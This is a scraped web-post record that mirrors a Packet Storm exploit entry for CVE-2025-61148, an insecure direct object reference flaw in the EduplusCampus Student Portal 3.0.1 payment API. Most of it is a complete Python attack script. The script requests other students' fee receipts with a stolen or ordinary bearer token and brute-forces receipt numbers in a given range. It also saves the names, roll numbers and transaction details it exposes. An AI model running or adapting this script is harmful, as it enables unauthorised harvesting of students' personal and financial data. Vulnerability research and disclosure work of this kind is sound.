{“lastseen”:”2025-12-12T17:15:06″,”description”:”EduplusCampus Student Portal version 3.0.1 suffers from an insecure direct object reference vulnerability…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EduplusCampus Student Portal 3.0.1 Insecure Direct Object Reference”,”source”:””,”references”:””,”id”:”PACKETSTORM:212772″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61148″],”sourceData”:”=============================================================================================================================================\\n | # Title : EduplusCampus student portal v 3.0.1 Broken Access Control |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.edupluscampus.com |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211727\/\\n \\n [+] Summary : Insecure Direct Object Reference (IDOR) vulnerability in EduplusCampus Student Payment API (version 3.0.1) \\n that allows authenticated users to access other students’ sensitive financial and personal information without proper authorization.\\n \\t\\t\\t \\n \\t\\t\\t \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Proof of Concept: CVE-2025-61148\\n IDOR Vulnerability in EduplusCampus Student Payment API\\n Author: indoushka\\n \\”\\”\\”\\n \\n import requests\\n import json\\n import sys\\n import argparse\\n from colorama import Fore, Style, init\\n \\n # Initialize colorama for colored output\\n init(autoreset=True)\\n \\n class CVE202561148_POC:\\n def __init__(self, base_url, auth_token):\\n self.base_url = base_url.rstrip(‘\/’)\\n self.headers = {\\n ‘Authorization’: f’Bearer {auth_token}’,\\n ‘Content-Type’: ‘application\/json’,\\n ‘User-Agent’: ‘Mozilla\/5.0 (Security-Test)’\\n }\\n \\n def print_banner(self):\\n \\”\\”\\”Display vulnerability banner\\”\\”\\”\\n banner = f\\”\\”\\”\\n {Fore.RED}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 CVE-2025-61148: IDOR Vulnerability POC \u2551\\n \u2551 EduplusCampus Student Payment API \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}\\n \\”\\”\\”\\n print(banner)\\n \\n def test_idor(self, original_rec_no, target_rec_no):\\n \\”\\”\\”Test IDOR vulnerability by modifying rec_no parameter\\”\\”\\”\\n endpoint = f\\”{self.base_url}\/student\/get-receipt\\”\\n \\n # Original request (authorized)\\n original_data = {\\n \\”rec_no\\”: original_rec_no\\n }\\n \\n # Malicious request (unauthorized access attempt)\\n malicious_data = {\\n \\”rec_no\\”: target_rec_no\\n }\\n \\n print(f\\”{Fore.CYAN}[*] Testing IDOR vulnerability…{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.YELLOW}[+] Original receipt number: {original_rec_no}{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.YELLOW}[+] Target receipt number: {target_rec_no}{Style.RESET_ALL}\\”)\\n \\n try:\\n # Test with original receipt number\\n print(f\\”\\\\n{Fore.WHITE}[1] Sending request for authorized receipt…{Style.RESET_ALL}\\”)\\n resp_original = requests.post(\\n endpoint,\\n headers=self.headers,\\n json=original_data,\\n timeout=30\\n )\\n \\n # Test with target receipt number\\n print(f\\”{Fore.WHITE}[2] Sending request for target receipt (IDOR test)…{Style.RESET_ALL}\\”)\\n resp_target = requests.post(\\n endpoint,\\n headers=self.headers,\\n json=malicious_data,\\n timeout=30\\n )\\n \\n # Analyze responses\\n self.analyze_responses(resp_original, resp_target)\\n \\n except requests.exceptions.RequestException as e:\\n print(f\\”{Fore.RED}[-] Request failed: {str(e)}{Style.RESET_ALL}\\”)\\n return False\\n \\n def analyze_responses(self, resp_original, resp_target):\\n \\”\\”\\”Analyze and compare the responses\\”\\”\\”\\n print(f\\”\\\\n{Fore.CYAN}[*] Response Analysis:{Style.RESET_ALL}\\”)\\n print(f\\”{‘=’*60}\\”)\\n \\n # Original response\\n print(f\\”{Fore.GREEN}[+] Original Request (Authorized):{Style.RESET_ALL}\\”)\\n print(f\\” Status Code: {resp_original.status_code}\\”)\\n if resp_original.status_code == 200:\\n try:\\n data = resp_original.json()\\n print(f\\” Response Length: {len(resp_original.text)} characters\\”)\\n if ‘fullname’ in data:\\n print(f\\” Contains PII: {Fore.RED}YES{Style.RESET_ALL}\\”)\\n except:\\n print(f\\” Response: {resp_original.text[:100]}…\\”)\\n \\n # Target response\\n print(f\\”\\\\n{Fore.RED}[+] Target Request (Unauthorized):{Style.RESET_ALL}\\”)\\n print(f\\” Status Code: {resp_target.status_code}\\”)\\n \\n if resp_target.status_code == 200:\\n try:\\n data = resp_target.json()\\n print(f\\” Response Length: {len(resp_target.text)} characters\\”)\\n \\n # Check if vulnerable\\n if ‘fullname’ in data or ‘rollno’ in data:\\n print(f\\”{Fore.RED}[!] VULNERABLE – Successfully accessed other user’s data!{Style.RESET_ALL}\\”)\\n print(f\\”\\\\n{Fore.YELLOW}[*] Exposed Information:{Style.RESET_ALL}\\”)\\n \\n # Display sensitive data (redacted for safety)\\n sensitive_keys = [‘fullname’, ‘rollno’, ‘component_total_amount’, \\n ‘trans_list’, ‘tid’, ‘date’, ‘amount’]\\n \\n for key in sensitive_keys:\\n if key in str(data):\\n if key == ‘fullname’:\\n print(f\\” \u2022 Full Name: {Fore.RED}[REDACTED]{Style.RESET_ALL}\\”)\\n elif key == ‘rollno’:\\n print(f\\” \u2022 Roll Number: {data.get(‘rollno’, ‘N\/A’)}\\”)\\n elif key == ‘component_total_amount’:\\n print(f\\” \u2022 Payment Amount: {data.get(‘component_total_amount’, ‘N\/A’)}\\”)\\n elif key == ‘trans_list’:\\n transactions = data.get(‘trans_list’, [])\\n if transactions:\\n print(f\\” \u2022 Transaction Details:\\”)\\n for trans in transactions:\\n print(f\\” – Date: {trans.get(‘date’, ‘N\/A’)}\\”)\\n print(f\\” – Amount: {trans.get(‘amount’, ‘N\/A’)}\\”)\\n print(f\\” – TID: {trans.get(‘tid’, ‘N\/A’)}\\”)\\n \\n # Save proof\\n self.save_proof(data)\\n \\n except json.JSONDecodeError:\\n print(f\\” Response: {resp_target.text[:200]}…\\”)\\n if len(resp_target.text) \\u003e 100:\\n print(f\\”{Fore.RED}[!] Potential vulnerability detected!{Style.RESET_ALL}\\”)\\n else:\\n print(f\\” Response: {resp_target.text[:100]}…\\”)\\n \\n def save_proof(self, data):\\n \\”\\”\\”Save proof of concept results\\”\\”\\”\\n filename = f\\”idor_proof_cve_2025_61148.json\\”\\n with open(filename, ‘w’) as f:\\n json.dump(data, f, indent=2)\\n print(f\\”\\\\n{Fore.GREEN}[+] Proof saved to: {filename}{Style.RESET_ALL}\\”)\\n \\n def brute_force_receipts(self, prefix=\\”PCUF-\\”, start=231800, end=232100):\\n \\”\\”\\”Attempt to discover valid receipt numbers\\”\\”\\”\\n print(f\\”\\\\n{Fore.CYAN}[*] Brute-forcing receipt numbers…{Style.RESET_ALL}\\”)\\n print(f\\” Range: {prefix}{start} to {prefix}{end}\\”)\\n \\n found_receipts = []\\n endpoint = f\\”{self.base_url}\/student\/get-receipt\\”\\n \\n for i in range(start, end + 1):\\n rec_no = f\\”{prefix}{i}\\”\\n \\n data = {\\”rec_no\\”: rec_no}\\n \\n try:\\n resp = requests.post(\\n endpoint,\\n headers=self.headers,\\n json=data,\\n timeout=10\\n )\\n \\n if resp.status_code == 200:\\n print(f\\”{Fore.GREEN}[+] Found valid receipt: {rec_no}{Style.RESET_ALL}\\”)\\n found_receipts.append(rec_no)\\n \\n # Quick analysis\\n try:\\n resp_data = resp.json()\\n if ‘fullname’ in resp_data:\\n print(f\\” Contains PII: YES\\”)\\n except:\\n pass\\n \\n except requests.exceptions.RequestException:\\n continue\\n \\n return found_receipts\\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=\\”CVE-2025-61148: IDOR Vulnerability POC for EduplusCampus\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter\\n )\\n \\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True, help=\\”Base URL (e.g., https:\/\/student.edupluscampus.com)\\”)\\n parser.add_argument(\\”-t\\”, \\”–token\\”, required=True, help=\\”Bearer token for authentication\\”)\\n parser.add_argument(\\”-o\\”, \\”–original\\”, help=\\”Original receipt number (authorized)\\”)\\n parser.add_argument(\\”-T\\”, \\”–target\\”, help=\\”Target receipt number to test\\”)\\n parser.add_argument(\\”-b\\”, \\”–bruteforce\\”, action=\\”store_true\\”, help=\\”Enable brute-force mode\\”)\\n parser.add_argument(\\”-p\\”, \\”–prefix\\”, default=\\”PCUF-\\”, help=\\”Receipt number prefix for brute-force\\”)\\n \\n args = parser.parse_args()\\n \\n # Initialize POC\\n poc = CVE202561148_POC(args.url, args.token)\\n poc.print_banner()\\n \\n print(f\\”{Fore.CYAN}[*] Target: {args.url}{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.CYAN}[*] Authentication token provided: {‘*’ * 20}{Style.RESET_ALL}\\”)\\n \\n if args.bruteforce:\\n # Brute-force mode\\n print(f\\”\\\\n{Fore.YELLOW}[!] Starting brute-force attack…{Style.RESET_ALL}\\”)\\n found = poc.brute_force_receipts(prefix=args.prefix)\\n \\n if found:\\n print(f\\”\\\\n{Fore.GREEN}[+] Found {len(found)} valid receipt numbers{Style.RESET_ALL}\\”)\\n for receipt in found:\\n print(f\\” \u2022 {receipt}\\”)\\n else:\\n print(f\\”{Fore.RED}[-] No valid receipt numbers found in the range{Style.RESET_ALL}\\”)\\n \\n elif args.original and args.target:\\n # Specific test mode\\n poc.test_idor(args.original, args.target)\\n \\n else:\\n print(f\\”{Fore.YELLOW}[!] Usage examples:{Style.RESET_ALL}\\”)\\n print(f\\” Specific test: python poc.py -u https:\/\/target.com -t YOUR_TOKEN -o PCUF-232025 -T PCUF-231824\\”)\\n print(f\\” Brute-force: python poc.py -u https:\/\/target.com -t YOUR_TOKEN -b\\”)\\n print(f\\”\\\\n{Fore.RED}[!] WARNING: Use only on authorized systems!{Style.RESET_ALL}\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212772″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212772\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-12T17:15:06″,”description”:”EduplusCampus Student Portal version 3.0.1 suffers from an insecure direct object reference vulnerability…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EduplusCampus Student Portal 3.0.1 Insecure Direct Object Reference”,”source”:””,”references”:””,”id”:”PACKETSTORM:212772″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61148″],”sourceData”:”=============================================================================================================================================\\n | # Title :…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-30771","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n